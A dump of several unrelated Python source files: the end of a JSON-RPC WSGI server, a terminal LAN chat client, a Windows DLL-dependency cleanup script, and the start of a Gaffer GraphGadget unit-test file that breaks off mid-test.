try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'MEGAHIT ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
    """Fill in a JSON-RPC error envelope from the incoming request and
    serialize it.

    error   -- dict of the form {'error': {'code': ..., 'name': ..., 'message': ...}}
    context -- per-request MethodContext, used only for logging
    request -- the parsed JSON-RPC request; its id/version fields are echoed back
    trace   -- optional traceback string; logged and embedded in the error body

    Returns the JSON-encoded error response as a string.
    """
    if trace:
        # log every traceback line except the trailing empty one
        self.log(log.ERR, context, trace.split('\n')[0:-1])
    if 'id' in request:
        error['id'] = request['id']
    if 'version' in request:
        # JSON-RPC 1.1 style request: echo version, attach trace only if the
        # caller did not already supply an 'error' detail
        error['version'] = request['version']
        e = error['error'].get('error')
        if not e:
            error['error']['error'] = trace
    elif 'jsonrpc' in request:
        # JSON-RPC 2.0 style request: trace goes into error.data
        error['jsonrpc'] = request['jsonrpc']
        error['error']['data'] = trace
    else:
        # no version info at all: fall back to 1.0 conventions
        error['version'] = '1.0'
        error['error']['error'] = trace
    return json.dumps(error)
def now_in_utc(self):
    """Return the current local time as an ISO 8601 string with UTC offset.

    The offset is computed from the local/UTC delta, rounded to the nearest
    minute (the ``+ 30`` before the division).
    """
    # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
    dtnow = datetime.datetime.now()
    dtutcnow = datetime.datetime.utcnow()
    delta = dtnow - dtutcnow
    hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
                    60)
    # %+03d (sign + two digits) instead of %+02d: ISO 8601 requires a
    # two-digit offset hour ("+05:30"), but %+02d produced "+5:30".
    return "%s%+03d:%02d" % (dtnow.isoformat(), hh, mm)
# Module-level singleton used both by uwsgi and by the standalone server below.
application = Application()

# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
    import uwsgi
    # Before we do anything with the application, see if the
    # configs specify patching all std routines to be asynch
    # *ONLY* use this if you are going to wrap the service in
    # a wsgi container that has enabled gevent, such as
    # uwsgi with the --gevent option
    if config is not None and config.get('gevent_monkeypatch_all', False):
        print "Monkeypatching std libraries for async"
        from gevent import monkey
        monkey.patch_all()
    # mount the application at the URL root
    uwsgi.applications = {'': application}
except ImportError:
    # Not available outside of wsgi, ignore
    pass
# Handle of the server subprocess when started with newprocess=True.
_proc = None


def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, will start the server on localhost on a system assigned port
    in the main thread. Excecution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    will also allow returning of the port number.'''
    global _proc
    if _proc:
        raise RuntimeError('server is already running')
    httpd = make_server(host, port, application)
    # port may have been 0 ("pick any"); read back the real one
    port = httpd.server_address[1]
    print("Listening on port %s" % port)
    if newprocess:
        _proc = Process(target=httpd.serve_forever)
        _proc.daemon = True
        _proc.start()
    else:
        # blocks until interrupted; the return below is only reached after that
        httpd.serve_forever()
    return port


def stop_server():
    """Terminate a server started with newprocess=True.

    A no-op when no server is running (previously this crashed with
    AttributeError by calling terminate() on None).
    """
    global _proc
    if _proc is not None:
        _proc.terminate()
        _proc = None
def process_async_cli(input_file_path, output_file_path, token):
    """Execute one JSON-RPC request read from a file and write the response
    to another file.

    input_file_path  -- JSON file holding the request object
    output_file_path -- destination for the JSON-encoded response
    token            -- optional auth token used to populate the call context

    Returns 0 on success, 500 when the response carries an error.
    """
    with open(input_file_path) as data_file:
        req = json.load(data_file)
    # normalise the request: default protocol version and a random id
    req.setdefault('version', '1.1')
    if 'id' not in req:
        req['id'] = str(_random.random())[2:]
    ctx = MethodContext(application.userlog)
    if token:
        ctx['user_id'] = application.auth_client.get_user(token)
        ctx['authenticated'] = 1
        ctx['token'] = token
    if 'context' in req:
        ctx['rpc_context'] = req['context']
    ctx['CLI'] = 1
    ctx['module'], ctx['method'] = req['method'].split('.')
    ctx['provenance'] = [{'service': ctx['module'],
                          'method': ctx['method'],
                          'method_params': req['params']}]
    try:
        resp = application.rpc_service.call_py(ctx, req)
    except JSONRPCError as jre:
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': jre.code,
                          'name': jre.message,
                          'message': jre.data,
                          'error': getattr(jre, 'trace', None)}
                }
    except Exception:
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': 0,
                          'name': 'Unexpected Server Error',
                          'message': 'An unexpected server error occurred',
                          'error': traceback.format_exc()}
                }
    exit_code = 500 if 'error' in resp else 0
    with open(output_file_path, "w") as f:
        f.write(json.dumps(resp, cls=JSONObjectEncoder))
    return exit_code
if __name__ == "__main__":
    # CLI mode: "script input.json output.json [token|token-file]" executes a
    # single async call and exits with its status code.
    if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
            os.path.isfile(sys.argv[1])):
        token = None
        if len(sys.argv) == 4:
            # the 4th argument may be either a file containing the token or
            # the token itself
            if os.path.isfile(sys.argv[3]):
                with open(sys.argv[3]) as token_file:
                    token = token_file.read()
            else:
                token = sys.argv[3]
        sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
    # Server mode: parse --port/--host and run the single-threaded server.
    try:
        opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
    except GetoptError as err:
        # print help information and exit:
        print str(err)  # will print something like "option -a not recognized"
        sys.exit(2)
    port = 9999
    host = 'localhost'
    for o, a in opts:
        if o == '--port':
            port = int(a)
        elif o == '--host':
            host = a
            print "Host set to %s" % host
        else:
            assert False, "unhandled option"
    start_server(host=host, port=port)
    # print "Listening on port %s" % port
    # httpd = make_server( host, port, application)
    #
    # httpd.serve_forever()
|
chat.py | import socket
import os
from _thread import *
import threading
import time
import sys
#CONFIGS
PORT=5000  # TCP port used for direct peer-to-peer message connections
messages = {}  # maps "username, ip" -> list of received messages (None until a message arrives)
HOST=''  # local IP address, filled in by get_ip()
USERNAME=''  # chosen display name, filled in by get_username()
def clear():
    """Clear the terminal screen (relies on the POSIX `clear` command)."""
    os.system('clear')
#GETS USERNAME
def get_username():
    """Prompt for a username, store it in the global USERNAME and return it."""
    clear()
    global USERNAME
    print("Welcome to Python Chat!\n\n")
    USERNAME = input("To continue, please type your username..\n")
    return USERNAME
#LEARNS USER'S IP AND CALLS LISTEN THREAD
def get_ip(USERNAME):
    """Detect the local IP address into the global HOST, print it together
    with USERNAME, then start the listener threads.

    Falls back to 127.0.0.1 when no route is available.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        global HOST
        # connecting a UDP socket sends no packets; it only selects the
        # outgoing interface, whose address is then readable locally
        s.connect(('10.255.255.255', 1))
        HOST = s.getsockname()[0]
    except OSError:
        # narrowed from a bare `except:` so Ctrl-C / SystemExit still propagate
        HOST = '127.0.0.1'
    finally:
        clear()
        print("Your USERNAME : %s\n" % (USERNAME))
        print("Your IP : %s\n" % (HOST))
        s.close()
    Listener_Thread()
#STARTS THREAD FOR LISTENING PACKETS
def Listener_Thread():
    """Start daemon threads for the UDP (announce) and TCP (message)
    listeners, then drop into the interactive prompt."""
    listener_UDP_thread = threading.Thread(target=listener_UDP)
    # set the .daemon attribute directly: setDaemon() is deprecated
    # since Python 3.10
    listener_UDP_thread.daemon = True
    listener_UDP_thread.start()
    listener_thread = threading.Thread(target=listener)
    listener_thread.daemon = True
    listener_thread.start()
    enter_command()
def enter_command():
    """Wait for the user to press Enter, then show the main menu."""
    input("\nPress Enter to continue...")
    main_menu()
#SENDS ANNOUNCE PACKETS VIA OPENING A UDP SOCKET AND BROADCASTING ANNOUNCEMENT.
def Announce():
    """Broadcast "[USERNAME, HOST, announce]" to UDP port 5566 every 10 s.

    Runs forever; intended to be the target of a daemon thread.
    """
    global PORT
    global USERNAME
    global HOST
    server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    server.settimeout(0.2)
    # NOTE(review): binds local port 5000 but broadcasts to 5566 -- confirm intent
    server.bind(("", 5000))
    packet="["+USERNAME+ ", " + HOST +", announce]"
    while True:
        server.sendto(packet.encode('ascii', 'replace'), ('<broadcast>', 5566))
        time.sleep(10)
#SHOWS MESSAGES AND POSSIBLES TO SEND MESSAGE
def show_messages():
    """Print the known conversations, prompt for a message, send it to the
    last non-self peer, and redisplay (via recursion).

    Typing '0' jumps to the main menu instead.
    """
    global messages
    clear()
    for k, v in messages.items():
        if v != None :
            # key is "username, ip"; show only the username
            print(str(k.split(',')[0]) + ": " + str(v))
    tmp2=input("Please write your message..\nType 0 to Main Menu\n")
    if tmp2=='0':
        # NOTE(review): main_menu() never returns normally, so the code
        # below is effectively skipped for '0' -- confirm
        main_menu()
    packet="["+USERNAME+ ", " + HOST +", message, "+ tmp2 +"]"
    target_ip = ""
    # pick a peer that is not ourselves; the LAST match wins
    for k, v in messages.items():
        key = str(k.split(',')[0])
        if key != USERNAME :
            target_ip = str(k.split(',')[1]).strip()
    start_new_thread(send_packet, (target_ip, PORT, packet))
    message_log(USERNAME, HOST, tmp2)
    # recurse to refresh the conversation view
    show_messages()
#POSSIBLES TO NAVIGATE IN MAIN MENU
def Navigator():
    """Read a menu choice: '1' starts announcing, '2' opens the message view;
    any other input (not just '0') exits the program."""
    tmp=input("Please type your selection..")
    if tmp == '1':
        clear()
        print("You are sending announce messages..")
        Announce_thread = threading.Thread(target=Announce)
        Announce_thread.setDaemon(True)
        Announce_thread.start()
        enter_command()
    elif tmp == '2':
        show_messages()
    else:
        clear()
        print("See you again!!")
        sys.exit(0)
#MAIN MENU FUNCTION
def main_menu():
    """Clear the screen, print the menu and hand control to Navigator()."""
    clear()
    print("You are in the main menu!")
    print("You are automatically responding announce messages!\n")
    print("If you want to send announce messages, please type 1")
    print("You can access your messages by typing 2\n")
    print("You can exit by typing 0")
    Navigator()
#MAIN FUNCTION
def main():
    """Entry point: ask for a username, then detect the IP and start listeners."""
    USERNAME = get_username()  # local copy; get_username also sets the global
    get_ip(USERNAME)
#TAKES HOST, PORTS AND PACKET INFO AND BY OPENING PORT SENDS MESSAGES
def send_packet(host, port, packet):
    """Best-effort: open a TCP connection to (host, port) and send `packet`.

    Network failures (unreachable peer, refused connection, timeout) are
    silently ignored; the socket is closed by the `with` block.
    """
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(1)
            s.connect((host, port))
            s.send(packet.encode('ascii', 'replace'))
            # no explicit close(): the context manager closes the socket
    except OSError:
        # narrowed from a bare `except:`; deliberate best-effort send
        pass
#FORMS MESSAGE LOGS
def message_log(name,ip,message=None):
    """Record a peer (and optionally a message) in the global `messages` dict.

    Without a message only the "name, ip" key is registered (value None);
    with one, the message is appended to that peer's list.
    """
    global messages
    key = '%s, %s' % (name, ip)
    if not message:
        # announce/response packet: just make sure the peer is known
        if key not in messages:
            messages[key] = None
    else:
        current = messages.get(key)
        if key not in messages or not current:
            # unknown peer, or known but without messages yet
            messages[key] = [message]
        else:
            current.append("%s" % (message,))
#PARSER FOR INCOMING PACKETS AND STARTS NEW THREAD FOR RESPONSE MESSAGES
def parser(data):
    """Decode an incoming packet of the form b"[name, ip, type(, payload)]"
    and dispatch it: reply to announces, log messages, register peers."""
    if len(data) > 5 :
        data=data.strip()
        data=data[1:-1]  # drop the surrounding [ ]
        data=data.decode('ascii','replace')
        # maxsplit=3 keeps commas inside the payload intact; the previous
        # maxsplit=4 could yield two trailing fields, making str(*etc)
        # raise TypeError for any message containing a comma.
        target_name, target_ip, target_type, *etc = data.split(',', 3)
        if target_type.strip() == 'announce' :
            packet="["+USERNAME+ ", " + HOST +", response]"
            message_log(target_name.strip(), target_ip.strip())
            start_new_thread(send_packet, (target_ip.strip(), PORT, packet))
        elif target_type.strip() == 'message' :
            # etc holds at most one element (the payload), possibly empty
            message_log(target_name.strip(), target_ip.strip(), str(*etc).strip())
        else :
            # 'response' and anything else just registers the peer
            message_log(target_name.strip(), target_ip.strip())
def listener_UDP():
    """Listen forever on UDP port 5566 for broadcast announce/response
    packets and feed each one to parser()."""
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
    client.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    client.bind(("", 5566))
    while True:
        data, addr = client.recvfrom(2048)
        parser(data)
#OPEN LISTEN SOCKET AND SENDS PACKETS TO THE PARSER
def listener():
    """Accept TCP connections on (HOST, PORT) forever, feeding each received
    packet to parser() and echoing it back to the sender."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((HOST,PORT))
        s.listen()
        while True:
            conn, addr = s.accept()
            # Handle each connection in isolation. Previously an empty recv()
            # (peer closed without sending) broke out of the accept loop and
            # killed the whole listener, and `conn` was never closed.
            with conn:
                data = conn.recv(2048)
                if not data:
                    continue
                parser(data)
                conn.send(data)
# Start the chat client when the module is executed.
main()
|
depcheck.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2016,2017 Christoph Reiter
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""Deletes unneeded DLLs and checks DLL dependencies.
Execute with the build python, will figure out the rest.
"""
import os
import subprocess
import sys
from multiprocessing import Process, Queue

import gi
# require_version() must run BEFORE the first "from gi.repository import ...";
# otherwise PyGObject may load an arbitrary version and emit a warning.
gi.require_version("GIRepository", "2.0")
from gi.repository import GIRepository
def _get_shared_libraries(q, namespace, version):
    """Worker: load `namespace`/`version` in this process and put its
    shared-library string (or None) on queue `q`."""
    repo = GIRepository.Repository()
    repo.require(namespace, version, 0)
    lib = repo.get_shared_library(namespace)
    q.put(lib)
def get_shared_libraries(namespace, version):
    """Return the shared-library string for a typelib, queried in a child
    process."""
    # we have to start a new process because multiple versions can't be loaded
    # in the same process
    q = Queue()
    p = Process(target=_get_shared_libraries, args=(q, namespace, version))
    p.start()
    # read the result before join() so the child can finish flushing the queue
    result = q.get()
    p.join()
    return result
def get_required_by_typelibs():
    """Return a set of (namespace, version, dll-name) tuples for every
    installed typelib."""
    deps = set()
    repo = GIRepository.Repository()
    for tl in os.listdir(repo.get_search_path()[0]):
        # typelib files are named "<Namespace>-<version>.typelib"
        namespace, version = os.path.splitext(tl)[0].split("-", 1)
        lib = get_shared_libraries(namespace, version)
        # the field may list several comma-separated DLLs
        libs = lib.lower().split(",") if lib else []
        for lib in libs:
            deps.add((namespace, version, lib))
    return deps
def get_dependencies(filename):
    """Return the lower-cased DLL names `filename` links against, read from
    `objdump -p` output. Returns [] for binaries objdump cannot parse."""
    try:
        raw = subprocess.check_output(
            ["objdump", "-p", filename], stderr=subprocess.STDOUT
        )
    except subprocess.CalledProcessError:
        # can happen with wrong arch binaries
        return []
    text = raw.decode("utf-8")
    return [
        line.strip().split(":", 1)[-1].strip().lower()
        for line in text.splitlines()
        if line.strip().startswith("DLL Name:")
    ]
def find_lib(root, name):
    """Return True if DLL `name` can be resolved: shipped in root/bin, present
    in the Windows system directory, or one of the known-external names."""
    if get_lib_path(root, name):
        return True
    system32 = os.path.join("C:", os.sep, "Windows", "System32")
    if os.path.exists(os.path.join(system32, name)):
        return True
    # gdiplus ships with Windows; msvcr* comes with the MSVC runtime
    if name == "gdiplus.dll" or name.startswith("msvcr"):
        return True
    return False


def get_lib_path(root, name):
    """Return the path of `name` under root/bin, or None when absent."""
    candidate = os.path.join(root, "bin", name)
    if os.path.exists(candidate):
        return candidate
def get_things_to_delete(root):
    """Return the paths of DLLs under root/bin that nothing appears to need.

    "Needed" seeds are all .exe files plus every DLL any .exe/.pyd/.dll
    depends on, plus everything required by installed typelibs; anything in
    `all_libs` but not in `needed` is a deletion candidate.  Missing
    dependencies are reported on stdout as a side effect.
    """
    extensions = [".exe", ".pyd", ".dll"]
    all_libs = set()
    needed = set()
    for base, dirs, files in os.walk(root):
        for f in files:
            lib = f.lower()
            path = os.path.join(base, f)
            ext_lower = os.path.splitext(f)[-1].lower()
            if ext_lower in extensions:
                if ext_lower == ".exe":
                    # we use .exe as dependency root
                    needed.add(lib)
                all_libs.add(f.lower())
                # NOTE(review): every dependency is marked needed even when
                # the depending library itself is unneeded -- conservative on
                # purpose? confirm before tightening
                for lib in get_dependencies(path):
                    all_libs.add(lib)
                    needed.add(lib)
                    if not find_lib(root, lib):
                        print("MISSING:", path, lib)
    for namespace, version, lib in get_required_by_typelibs():
        all_libs.add(lib)
        needed.add(lib)
        if not find_lib(root, lib):
            print("MISSING:", namespace, version, lib)
    to_delete = []
    for not_depended_on in all_libs - needed:
        path = get_lib_path(root, not_depended_on)
        if path:
            to_delete.append(path)
    return to_delete
def main(argv):
    """Report unneeded libraries under sys.prefix; with --delete, remove them
    repeatedly until a fixed point is reached (deleting a DLL can orphan the
    libraries only it depended on)."""
    libs = get_things_to_delete(sys.prefix)
    if "--delete" not in argv[1:]:
        return
    while libs:
        for lib in libs:
            print("DELETE:", lib)
            os.unlink(lib)
        libs = get_things_to_delete(sys.prefix)
# Script entry point.
if __name__ == "__main__":
    main(sys.argv)
|
GraphGadgetTest.py | ##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import imath
import IECore
import Gaffer
import GafferUI
import GafferTest
import GafferUITest
class NestedPlugTestNode( Gaffer.Node ) :
    # Minimal node used by the tests below; its "c" plug is given a
    # CompoundNodule (registered underneath) so nested-plug connections
    # are visualised.

    def __init__( self ) :

        Gaffer.Node.__init__( self )

IECore.registerRunTimeTyped( NestedPlugTestNode )
Gaffer.Metadata.registerValue( NestedPlugTestNode, "c", "nodule:type", "GafferUI::CompoundNodule" )
class GraphGadgetTest( GafferUITest.TestCase ) :
def testRemovedNodesDontHaveGadgets( self ) :
    """Deleting a node removes its gadget from the graph."""
    # failUnless/failIf are deprecated unittest aliases, removed in
    # Python 3.12; use assertTrue/assertFalse instead.
    s = Gaffer.ScriptNode()
    g = GafferUI.GraphGadget( s )
    n = GafferTest.AddNode()
    s["add1"] = n
    self.assertTrue( g.nodeGadget( n ) is not None )
    s.deleteNodes( filter = Gaffer.StandardSet( [ n ] ) )
    self.assertTrue( g.nodeGadget( n ) is None )
def testRemovedNodesDontHaveConnections( self ) :
    """Deleting a node also removes its connection gadgets."""
    s = Gaffer.ScriptNode()
    n = GafferTest.AddNode()
    s["add1"] = n
    s["add2"] = GafferTest.AddNode()
    s["add1"]["op1"].setInput( s["add2"]["sum"] )
    g = GafferUI.GraphGadget( s )
    s.deleteNodes( filter = Gaffer.StandardSet( [ s["add1"] ] ) )
    # failIf is a deprecated unittest alias (removed in Python 3.12)
    self.assertFalse( g.connectionGadget( n["op1"] ) )
def testCreateWithFilter( self ) :
    """Only nodes in the filter set get gadgets at construction time."""
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add2"] = GafferTest.AddNode()
    nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
    g = GafferUI.GraphGadget( script, nodeFilter )
    self.assertFalse( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
def testEditFilter( self ) :
    """Adding/removing nodes in the filter set shows/hides their gadgets."""
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add2"] = GafferTest.AddNode()
    nodeFilter = Gaffer.StandardSet( script.children() )
    g = GafferUI.GraphGadget( script, nodeFilter )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
    nodeFilter.remove( script["add1"] )
    self.assertFalse( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
    nodeFilter.remove( script["add2"] )
    self.assertFalse( g.nodeGadget( script["add1"] ) )
    self.assertFalse( g.nodeGadget( script["add2"] ) )
    nodeFilter.add( script["add1"] )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertFalse( g.nodeGadget( script["add2"] ) )
    nodeFilter.add( script["add2"] )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
def testUnhidingConnectedDstNodes( self ) :
    """Un-hiding a destination node also creates its connection gadget."""
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add2"] = GafferTest.AddNode()
    script["add2"]["op1"].setInput( script["add1"]["sum"] )
    nodeFilter = Gaffer.StandardSet( [ script["add1"] ] )
    g = GafferUI.GraphGadget( script, nodeFilter )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertFalse( g.nodeGadget( script["add2"] ) )
    self.assertFalse( g.connectionGadget( script["add2"]["op1"] ) )
    nodeFilter.add( script["add2"] )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
    self.assertTrue( g.connectionGadget( script["add2"]["op1"] ) )
def testCreatingWithHiddenSrcNodes( self ) :
    """A connection from a hidden source is shown dangling (no src nodule)."""
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add2"] = GafferTest.AddNode()
    script["add2"]["op1"].setInput( script["add1"]["sum"] )
    nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
    g = GafferUI.GraphGadget( script, nodeFilter )
    self.assertFalse( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
    c = g.connectionGadget( script["add2"]["op1"] )
    self.assertTrue( c )
    self.assertTrue( c.dstNodule().plug().isSame( script["add2"]["op1"] ) )
    self.assertIsNone( c.srcNodule() )
def testHidingConnectedDstNodes( self ) :
    """Hiding a destination node hides its gadget and connection."""
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add2"] = GafferTest.AddNode()
    script["add2"]["op1"].setInput( script["add1"]["sum"] )
    nodeFilter = Gaffer.StandardSet( script.children() )
    g = GafferUI.GraphGadget( script, nodeFilter )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
    self.assertTrue( g.connectionGadget( script["add2"]["op1"] ) )
    nodeFilter.remove( script["add2"] )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertFalse( g.nodeGadget( script["add2"] ) )
    self.assertFalse( g.connectionGadget( script["add2"]["op1"] ) )
def testHidingConnectedSrcNodes( self ) :
    """Hiding a source node leaves the connection dangling at the dst end."""
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add2"] = GafferTest.AddNode()
    script["add2"]["op1"].setInput( script["add1"]["sum"] )
    nodeFilter = Gaffer.StandardSet( [ script["add1"], script["add2"] ] )
    g = GafferUI.GraphGadget( script, nodeFilter )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
    c = g.connectionGadget( script["add2"]["op1"] )
    self.assertTrue( c )
    self.assertTrue( c.srcNodule().plug().isSame( script["add1"]["sum"] ) )
    self.assertTrue( c.dstNodule().plug().isSame( script["add2"]["op1"] ) )
    nodeFilter.remove( script["add1"] )
    self.assertFalse( g.nodeGadget( script["add1"] ) )
    c = g.connectionGadget( script["add2"]["op1"] )
    self.assertTrue( c )
    self.assertIsNone( c.srcNodule() )
    self.assertTrue( c.dstNodule().plug().isSame( script["add2"]["op1"] ) )
def testConnectingInvisibleDstNodes( self ) :
    """Connecting to a filtered-out destination creates no gadgets."""
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add2"] = GafferTest.AddNode()
    nodeFilter = Gaffer.StandardSet( [ script["add1"] ] )
    g = GafferUI.GraphGadget( script, nodeFilter )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertFalse( g.nodeGadget( script["add2"] ) )
    script["add2"]["op1"].setInput( script["add1"]["sum"] )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertFalse( g.nodeGadget( script["add2"] ) )
    self.assertFalse( g.connectionGadget( script["add2"]["op1"] ) )
def testConnectingHiddenDstNodes( self ) :
    """Connecting to a node hidden after construction creates no gadgets."""
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add2"] = GafferTest.AddNode()
    nodeFilter = Gaffer.StandardSet( script.children() )
    g = GafferUI.GraphGadget( script, nodeFilter )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertTrue( g.nodeGadget( script["add2"] ) )
    nodeFilter.remove( script["add2"] )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertFalse( g.nodeGadget( script["add2"] ) )
    script["add2"]["op1"].setInput( script["add1"]["sum"] )
    self.assertTrue( g.nodeGadget( script["add1"] ) )
    self.assertFalse( g.nodeGadget( script["add2"] ) )
    self.assertFalse( g.connectionGadget( script["add2"]["op1"] ) )
def testConnectingHiddenSrcNodes( self ) :
    """Connecting from a hidden source yields a dangling connection."""
    script = Gaffer.ScriptNode()
    script["add1"] = GafferTest.AddNode()
    script["add2"] = GafferTest.AddNode()
    nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
    g = GafferUI.GraphGadget( script, nodeFilter )
    self.assertFalse( g.nodeGadget( script["add1"] ) )
